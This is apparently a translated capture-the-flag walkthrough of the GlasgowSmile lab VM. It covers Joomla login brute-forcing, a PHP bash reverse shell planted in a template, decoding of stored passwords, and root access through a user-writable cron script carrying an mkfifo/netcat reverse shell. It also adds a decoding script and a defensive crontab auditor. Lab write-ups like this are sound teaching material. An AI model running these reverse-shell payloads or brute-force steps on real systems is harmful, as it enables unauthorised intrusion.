GlasgowSmile-v1.1 Box Practice
Preface
This started as my usual daily box practice; normally my box notes go up on CSDN, but this one really broke me! The Joker's smile box: once you finish it you realise you are the clown. Seven terminals open and still not enough, as you can tell from the users logged into in the sections below. Posting today's box out of frustration, for the record.
I write quite detailed notes and explain unfamiliar commands and tools, so if you can stick with it you can learn a lot. If people like this box writeup I will post my backlog of boxes to the public account as a collection.
The "Glasgow Smile" box download link is at the end of the article.
I. Host discovery and information gathering
Target IP
The VM shows its IP as soon as it boots: 192.168.25.162
export ip=192.168.25.162
Port scan
nmap --min-rate 10000 -p- $ip
Ports 22 and 80 are open
Service scan
nmap -sT -sV -O -p22,80 $ip
Result
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
MAC Address: 00:0C:29:75:54:5A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Script scan
nmap --script=vuln -p22,80 $ip
Result: nothing of much use here
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:75:54:5A (VMware)
II. Penetration
(1) Port 80, the web side
Visiting it, we are greeted by a static image, very CTF-like.
There are also some fingerprints of the site here.
So let's brute-force directories.
gobuster dir -u http://192.168.25.162/ -w /usr/share/dirbuster/wordlists/medium.txt
gobuster only turned up one directory:
http://192.168.25.162/joomla/
Let's brute-force again with dirb.
dirb http://192.168.25.162/
There are many more files under this directory:
---- Entering directory: http://192.168.25.162/joomla/ ----
==> DIRECTORY: http://192.168.25.162/joomla/administrator/
+ http://192.168.25.162/joomla/index.php (CODE:200|SIZE:10013)
+ http://192.168.25.162/joomla/robots.txt (CODE:200|SIZE:836)
http://192.168.25.162/joomla/administrator/
A backend login page; the site runs the Joomla! CMS.
http://192.168.25.162/joomla/index.php
Home page
http://192.168.25.162/joomla/robots.txt
This one does give us some information:
-- If the Joomla site is installed within a folder
-- eg www.example.com/joomla/ then the robots.txt file
-- MUST be moved to the site root
-- eg www.example.com/robots.txt
-- AND the joomla folder name MUST be prefixed to all of the paths.
-- eg the Disallow rule for the /administrator/ folder MUST
-- be changed to read
Disallow: /joomla/administrator/
For more information about the robots.txt standard, see:
http://www.robotstxt.org/orig.html
For syntax checking, see:
http://tool.motoricerca.info/robots-checker.phtml
User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/
The administrator directory is disallowed in robots.txt, yet we already found it, so it must be an important part of the site.
Search for this CMS, Joomla.
We find a Joomla RCE vulnerability; we can only try it blindly because we do not know the exact version.
Download the EXP and run it.
Check the help.
First check with the -c parameter; it reports not vulnerable, so we switch to another EXP.
Really, though, we need to determine the component version first; information online says to log into the backend to see it.
But we found that the version is also present in an XML file.
Path: /joomla/administrator/manifests/files/joomla.xml
We find it is readable without logging in.
And we get the version: 3.7.3
Search again with searchsploit:
searchsploit Joomla 3.7.3
Only a single cross-site scripting (XSS) entry, which is no use for an initial foothold.
So let's try brute-forcing the password; there is nothing else left to try.
cewl http://192.168.25.162/joomla -w pss.txt
- cewl is a tool that crawls a website and generates a custom wordlist. It extracts words from the given site and is typically used for password guessing in cracking or security testing.
- -w pss.txt is an output option: -w writes the extracted words to a file, and pss.txt is the name of that file.
The usernames are our three guesses: jokker, joomla, admin
The passwords crawled out of the site:
you
Joker
the
Home
laughing
Email
your
that
what
funny
and
Arthur
Begin
Content
End
Right
Sidebar
Username
Password
Forgot
You
Isn
decide
right
was
chuckling
Cop
Psychiatrist
just
thinking
Glasgow
Smile
Print
username
password
Body
Header
User
Uncategorised
are
here
Main
Menu
Login
Form
Remember
Log
Footer
Back
Top
Details
Written
Super
Category
Published
June
Hits
Comedy
subjective
Murray
they
say
All
system
knows
much
wrong
The
same
way
not
Why
everybody
upset
about
these
guys
dying
sidewalk
walk
over
pass
every
day
don
notice
police
car
chaos
being
spread
Gotham
City
Stop
freak
This
isn
Yeah
whole
fucking
city
fire
because
know
beautiful
loudly
during
psychiatric
examination
Arkham
Asylum
soon
settles
down
but
still
laughs
What
some
more
joke
wanna
tell
softly
whispers
wouldn
get
this
link
friend
Address
article
email
address
account
will
Close
Window
Your
Please
enter
Submit
for
verification
code
Sender
Subject
Send
Cancel
end
items
leading
RSS
Atom
associated
with
emailed
file
sent
Once
have
received
able
choose
new
We brute-force the backend login first; the backend is what matters most.
The wordlist is small, so fire straight away with cluster bomb mode.
A few hits came out; let's take a look:
admin isn
joomla Gotham
These two. joomla / Gotham logs in successfully.
Search directly for how to get a shell from the Joomla backend.
Here we are using the second method.
Backend: Global Configuration -> Media -> Legal Extensions (File Types); add the php extension, then upload through Media.
Save, go back to the home page and click Media.
We upload but still nothing appears; not sure what is going on.
So we switch to the third method, editing a template.
Any template will do.
Upload our PHP shell.
If upload is refused, we create a file instead.
Enter the reverse shell code:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.25.132/4444 0>&1'");?>
HackTricks: https://book.hacktricks.xyz/ is where you can look up reverse shell code.
Save.
Start a listener on Kali:
nc -nvlp 4444
Then visit:
http://192.168.25.162/joomla/templates/protostar/shell.php
III. Initial access
Reverse shell successful.
IV. Privilege escalation
Interactive shell and basic enumeration:
python -c 'import pty; pty.spawn("/bin/bash")'
whoami && id && hostname && ip addr
uname -a
ls -liah
cat /etc/passwd | grep -v "nologin"
cat /etc/*-release   # show the distribution name and version
cd ~
ls -liah
There is a how_to.txt file, and rob may be a user.
cd joomla2
cat configuration.php
Found the MySQL username and password:
joomla babyjoker
MySQL login
Log into this MySQL database:
mysql -u joomla -p
Logged in successfully.
First list the databases:
show databases;
Just look at batjoke; the other databases are not important, and this one stands out immediately.
use batjoke;
show tables;
select * from equipment;
select * from taskforce;
Found users and passwords:
+----+---------+------------+---------+----------------------------------------------+
| id | type | date | name | pswd |
+----+---------+------------+---------+----------------------------------------------+
| 1 | Soldier | 2020-06-14 | Bane | YmFuZWlzaGVyZQ== |
| 2 | Soldier | 2020-06-14 | Aaron | YWFyb25pc2hlcmU= |
| 3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ== |
| 4 | Soldier | 2020-06-14 | buster | YnVzdGVyaXNoZXJlZmY= |
| 6 | Soldier | 2020-06-14 | rob | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ |
| 7 | Soldier | 2020-06-14 | aunt | YXVudGlzIHRoZSBmdWNrIGhlcmU= |
+----+---------+------------+---------+----------------------------------------------+
There is exactly the rob user we need; let's decode the password, it looks like Base64:
???AllIHaveAreNegativeThoughts???
Logging in as rob
We log in as rob over ssh successfully.
First, of course, sudo -l to check permissions.
Fine, fine, no sudo.
Then let's see what this user can run:
find / -perm -4000 -print 2>/dev/null
Also check for root-owned files that are writable:
find / -type f -user root -perm -o=w ! -path "/proc/*" 2>/dev/null
Nothing useful.
Back to our home directory to look at the files:
cd ~
ls -liah
We find a user.txt file and an Abnerineedyourhelp file:
rob@glasgowsmile:~$ cat user.txt
JKR[f5bb11acbb957915e421d62e7253d27a]
rob@glasgowsmile:~$ cat Abnerineedyourhelp
Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's."
Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==
It has to be encryption, not just encoding.
A glance shows the letters have been scrambled.
It is not a plain character-for-character substitution either, so we guess an ASCII offset and decode it as a Caesar shift; searching the output for "pass" confirms it was indeed shifted:
Hello Dear, Arthur suffers from severe mental illness but we see little sympathy for his condition. This relates to his feeling about being ignored. You can find an entry in his journal reads, "The worst part of having a mental illness is people expect you to behave as if you don't."
Now I need your help Abner, use this password, you will find the right way to solve the enigma. STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==
Take the unshifted password and Base64-decode it:
I33hope99my0death000makes44more8cents00than0my0life0
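As an added example (not code from the original writeup), here is the whole decoding chain from the last two steps in one Python script: the Base64 pswd column from the taskforce table, and the shifted note together with the shifted Base64 blob. It brute-forces the Caesar shift using the crib "password" from the note, applies the same shift to the blob, and only then Base64-decodes it. The sample strings are copied from this page; the function names are my own. The point for a defender: Base64 and a single-letter shift are encodings, not encryption, so credentials stored this way in a database or a note are effectively plaintext.

```python
import base64
import binascii

# Rows from the taskforce table on the box (name, pswd), copied from the page.
TASKFORCE_ROWS = [
    ("Bane", "YmFuZWlzaGVyZQ=="),
    ("rob", "Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/"),
]

# The shifted note and the shifted Base64 blob from Abnerineedyourhelp,
# copied from the page.
NOTE_CIPHER = (
    "Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd "
    "rxlozsgx enq ghr bnmchshnm. Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, "
    "xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz."
)
BLOB_CIPHER = "RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ=="


def caesar_shift(text: str, shift: int) -> str:
    """Shift A-Z and a-z by `shift` places with wrap-around.

    Digits, punctuation and Base64's '+', '/', '=' are left untouched, which
    is why the shifted blob above still looks like Base64.
    """
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def find_shift(cipher: str, crib: str):
    """Try all 26 shifts; return the first one whose output contains `crib`."""
    for shift in range(26):
        if crib in caesar_shift(cipher, shift):
            return shift
    return None


def b64_to_text(s: str):
    """Strict Base64 decode to printable ASCII, or None if it is not Base64 text."""
    try:
        raw = base64.b64decode(s, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError):
        return None
    return text if text.isprintable() else None


def decode_b64_column(rows):
    """Decode a (name, base64) column the way the taskforce table was decoded."""
    return {name: b64_to_text(value) for name, value in rows}


def recover_password(note_cipher: str, blob_cipher: str, crib: str = "password"):
    """Find the shift from the prose, apply it to the blob, then Base64-decode.

    Returns (shift, unshifted_blob, decoded_password); decoded_password is
    None when the unshifted blob is not valid Base64 text.
    """
    shift = find_shift(note_cipher, crib)
    if shift is None:
        return None, None, None
    fixed = caesar_shift(blob_cipher, shift)
    return shift, fixed, b64_to_text(fixed)


if __name__ == "__main__":
    print(decode_b64_column(TASKFORCE_ROWS))
    shift, fixed, password = recover_password(NOTE_CIPHER, BLOB_CIPHER)
    print(f"shift={shift}")
    print(caesar_shift(NOTE_CIPHER, shift))
    print(password)
```

The crib search is what turns "guess the offset" into a one-line check: any shift that makes the prose contain a known word is almost certainly the right one, and applying it to the blob before decoding avoids feeding garbage to the Base64 decoder.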
Logging in as abner
ssh abner@192.168.25.162
Damn! Still no sudo; feels like there is another layer.
Same process as before, nothing; keep looking at the home directory:
cd ~
ls -liah
Here there is user2.txt:
abner@glasgowsmile:~$ cat user2.txt
JKR{0286c47edc9bfdaf643f5976a8cfbd8d}
And an info.txt:
A Glasgow smile is a wound caused by making a cut from the corners of a victim's mouth up to the ears, leaving a scar in the shape of a smile.
The act is usually performed with a utility knife or a piece of broken glass, leaving a scar which causes the victim to appear to be smiling broadly.
The practice is said to have originated in Glasgow, Scotland in the 1920s and 30s. The attack became popular with English street gangs (especially among the Chelsea Headhunters, a London-based hooligan firm, among whom it is known as a "Chelsea grin" or "Chelsea smile").
The first flag's hash:
f5bb11acbb957915e421d62e7253d27a
The second flag's hash:
0286c47edc9bfdaf643f5976a8cfbd8d
hash-identifier 0286c47edc9bfdaf643f5976a8cfbd8d
Identified as MD5, so go and crack it.
- Online MD5 cracking sites: pmd5.com, ttmd5.com, www.somd5.com, xmd5.com, https://hashes.com/zh/decrypt/hash (worth bookmarking)
Damn! None of them work.
cat .bash_history
Something was unzipped.
Let's find that archive:
find / -name .dear_penguins.zip 2>/dev/null
/var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
unzip /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
It needs a password too:
[/var/www/joomla2/administrator/manifests/files/.dear_penguins.zip] dear_penguins password:
I33hope99my0death000makes44more8cents00than0my0life0
Give it the password:
abner@glasgowsmile:~$ cat dear_penguins
My dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!!
scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
Decoding it gives nothing; it is probably not encoded at all.
Try logging in as penguin.
Logging in as penguin
ssh penguin@192.168.25.162
Still no sudo.
Check the directories, as experience dictates.
Look at the user3 file:
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat user3.txt
JKR{284a3753ec11a592ee34098b8cb43d52}
Then the PeopleAreStartingToNotice.txt file:
Hey Penguin,
I'm writing software, I can't make it work because of a permissions issue. It only runs with root permissions. When it's complete I'll copy it to this folder.
Joker
Software is being written, and there is a file that only runs as root; that must be this find, and clearly a scheduled task is involved:
655370 -rwSr----- 1 penguin penguin 309K Jun 15 2020 find
Here we use pspy to monitor processes:
https://github.com/DominicBreuker/pspy.git
Download it.
Start a web server on Kali:
python -m http.server 80
Download it on the target:
wget http://192.168.25.132:80/pspy64
After downloading, make it executable:
chmod +x pspy64
./pspy64 -h
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Usage:
pspy [flags]
Flags:
-c, --color color the printed events (default true)
--debug print detailed error messages
-d, --dirs stringArray watch these dirs
-f, --fsevents print file system events to stdout
-h, --help help for pspy
-i, --interval int scan every 'interval' milliseconds for new processes (default 100)
--ppid record process ppids
-p, --procevents print new processes to stdout (default true)
-r, --recursive_dirs stringArray watch these dirs recursively (default [/usr,/tmp,/etc,/home,/var,/opt])
-t, --truncate int truncate process cmds longer than this (default 2048)
Start monitoring:
./pspy64 -p -i 1000
We observe /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old being executed every minute.
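As an added example (not code from the original writeup), a small Python audit of the kind a defender would run to catch exactly this misconfiguration: a crontab entry running as root whose command points at a file that root does not own, or that group/others can write. The crontab text and file metadata below are constructed to resemble what pspy revealed on this box (the page never shows /etc/crontab itself, so that line and the uid 1000 are assumptions); the lookup callback lets the same function run against the real filesystem through os.stat.

```python
import os
import stat
from typing import Callable, List, NamedTuple, Optional, Tuple

# Constructed sample crontab. The page only shows pspy reporting that
# /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old runs every minute, so
# this root entry is an assumption about what /etc/crontab looked like.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*  *    * * *   root    /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
"""

# Constructed file metadata: path -> (owner uid, st_mode). uid 1000 stands
# in for the penguin user; the real box's uids are not on the page.
SAMPLE_FILES = {
    "/home/penguin/SomeoneWhoHidesBehindAMask/.trash_old": (1000, stat.S_IFREG | 0o755),
    "/etc/cron.hourly": (0, stat.S_IFDIR | 0o755),
}

Lookup = Callable[[str], Optional[Tuple[int, int]]]


class Finding(NamedTuple):
    run_as: str
    path: str
    reason: str


def stat_lookup(path: str) -> Optional[Tuple[int, int]]:
    """Real-filesystem lookup, for running the audit outside the sample data."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid, st.st_mode


def parse_system_crontab(text: str):
    """Yield (user, command) from /etc/crontab-style lines (5 time fields + user + command).

    Skips comments, blank lines and VAR=value assignments; @reboot-style
    shortcuts take the place of the five time fields.
    """
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        head = line.split(None, 1)[0]
        if "=" in head:
            continue  # environment assignment such as SHELL= or PATH=
        n_time_fields = 1 if head.startswith("@") else 5
        fields = line.split(None, n_time_fields + 1)
        if len(fields) < n_time_fields + 2:
            continue  # malformed: user or command missing
        yield fields[n_time_fields], fields[n_time_fields + 1]


def audit_crontab(text: str, lookup: Lookup = stat_lookup) -> List[Finding]:
    """Flag root entries whose absolute-path targets a lower-privileged user could edit.

    Two conditions are checked for every absolute path in the command:
    the file is not owned by root, or it is group/world writable.
    """
    findings: List[Finding] = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for token in command.split():
            if not token.startswith("/"):
                continue
            meta = lookup(token)
            if meta is None:
                continue  # path does not exist or is not in the sample data
            uid, mode = meta
            if uid != 0:
                findings.append(Finding(user, token, f"owned by uid {uid}, not root"))
            elif mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append(Finding(user, token, "group/world writable"))
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB, SAMPLE_FILES.get):
        print(f"[!] cron as {f.run_as} executes {f.path}: {f.reason}")
```

Replace `SAMPLE_FILES.get` with the default `stat_lookup` and feed it the contents of /etc/crontab and /etc/cron.d/* to run it on a real host. The mitigation is the mirror image of the finding: anything root executes on a schedule should live in a root-owned directory with mode 0755 or tighter, never under a user's home.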
So we just edit it and write our payload in.
vi .trash_old
Write the shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.25.132 4555>/tmp/f
- rm /tmp/f: first try to remove any file named f under /tmp, so a leftover file does not interfere with the following steps.
- mkfifo /tmp/f: use mkfifo to create a named pipe called /tmp/f. A named pipe is a special type of file that lets processes communicate, like an ordinary pipe but persistent on the filesystem.
- cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.25.132 4555>/tmp/f: a pipeline made of these parts:
  - cat /tmp/f: read data from the /tmp/f named pipe.
  - /bin/sh -i: start an interactive shell.
  - 2>&1: redirect standard error to standard output, so error messages also travel through the pipe.
  - nc 192.168.25.132 4555: use nc (netcat) to connect to the remote host at IP 192.168.25.132, port 4555.
  - >/tmp/f: redirect what nc receives from the remote side into the /tmp/f named pipe, forming a loop: remote input is read by cat and passed to /bin/sh -i, and the shell's output in turn goes back out through nc to the remote host.
vi is awkward to use over ssh, so here we just clear the file and rewrite it.
echo > .trash_old
#!/bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.25.132 4555>/tmp/f
vi
i
paste
Esc
:wq
Wait for the connection.
Root login; privilege escalation successful.
Getting the box
The box is here!!
Originally published on the WeChat public account 泷羽Sec-Blanks: GlasgowSmile-v1.1 box practice (it really broke me, hence this post, for the record!)